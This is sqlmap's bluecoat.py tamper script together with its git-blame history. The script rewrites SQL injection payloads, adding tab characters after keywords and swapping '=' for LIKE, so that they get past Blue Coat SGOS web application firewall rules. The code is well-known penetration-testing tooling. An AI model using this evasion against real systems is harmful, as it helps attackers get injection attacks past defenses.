sqlmap/tamper/bluecoat.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character after SQL statement with a valid random blank character.
    Afterwards replace character = with LIKE operator

    Requirement:
        * Blue Coat SGOS with WAF activated as documented in
        https://kb.bluecoat.com/index?page=content&id=FAQ2147

    Tested against:
        * MySQL 5.1, SGOS

    Notes:
        * Useful to bypass Blue Coat's recommended WAF rule configuration

    >>> tamper('SELECT id FROM users WHERE id = 1')
    'SELECT%09id FROM%09users WHERE%09id LIKE 1'
    """

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords:
            return match.group().replace(word, "%s%%09" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal)
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        retVal = retVal.replace("%09 ", "%09")

    return retVal
reverted a previous commit as not all distributions create a link file /usr/bin/python2 to the Python interpreter 2013-02-14 15:32:17 +04:00			`#!/usr/bin/env python`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`"""`
New version preparation 2017-01-02 16:19:18 +03:00			`Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`See the file 'doc/COPYING' for copying permission`
			`"""`

			`import re`

Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`from lib.core.data import kb`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`from lib.core.enums import PRIORITY`

Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`__priority__ = PRIORITY.NORMAL`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`def dependencies():`
Fix of false statement (bluecoat.py was not meant to be used only against MySQL - Issue #261) 2012-11-29 18:53:54 +04:00			`pass`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Update for an Issue #12 2012-12-03 17:27:01 +04:00			`def tamper(payload, **kwargs):`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`"""`
			`Replaces space character after SQL statement with a valid random blank character.`
			`Afterwards replace character = with LIKE operator`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`Requirement:`
Fix of false statement (bluecoat.py was not meant to be used only against MySQL - Issue #261) 2012-11-29 18:53:54 +04:00			`* Blue Coat SGOS with WAF activated as documented in`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`https://kb.bluecoat.com/index?page=content&id=FAQ2147`

			`Tested against:`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`* MySQL 5.1, SGOS`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`Notes:`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`* Useful to bypass Blue Coat's recommended WAF rule configuration`
Another update for an Issue #352 and couple of fixes 2013-03-14 00:57:09 +04:00
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`>>> tamper('SELECT id FROM users WHERE id = 1')`
			`'SELECT%09id FROM%09users WHERE%09id LIKE 1'`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`"""`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`def process(match):`
			`word = match.group('word')`
			`if word.upper() in kb.keywords:`
			`return match.group().replace(word, "%s%%09" % word)`
			`else:`
			`return match.group()`

Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`retVal = payload`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`if payload:`
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]\|\Z)", lambda match: process(match), retVal)`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`retVal = re.sub(r"\s=\s", " LIKE ", retVal)`
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`retVal = retVal.replace("%09 ", "%09")`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`return retVal`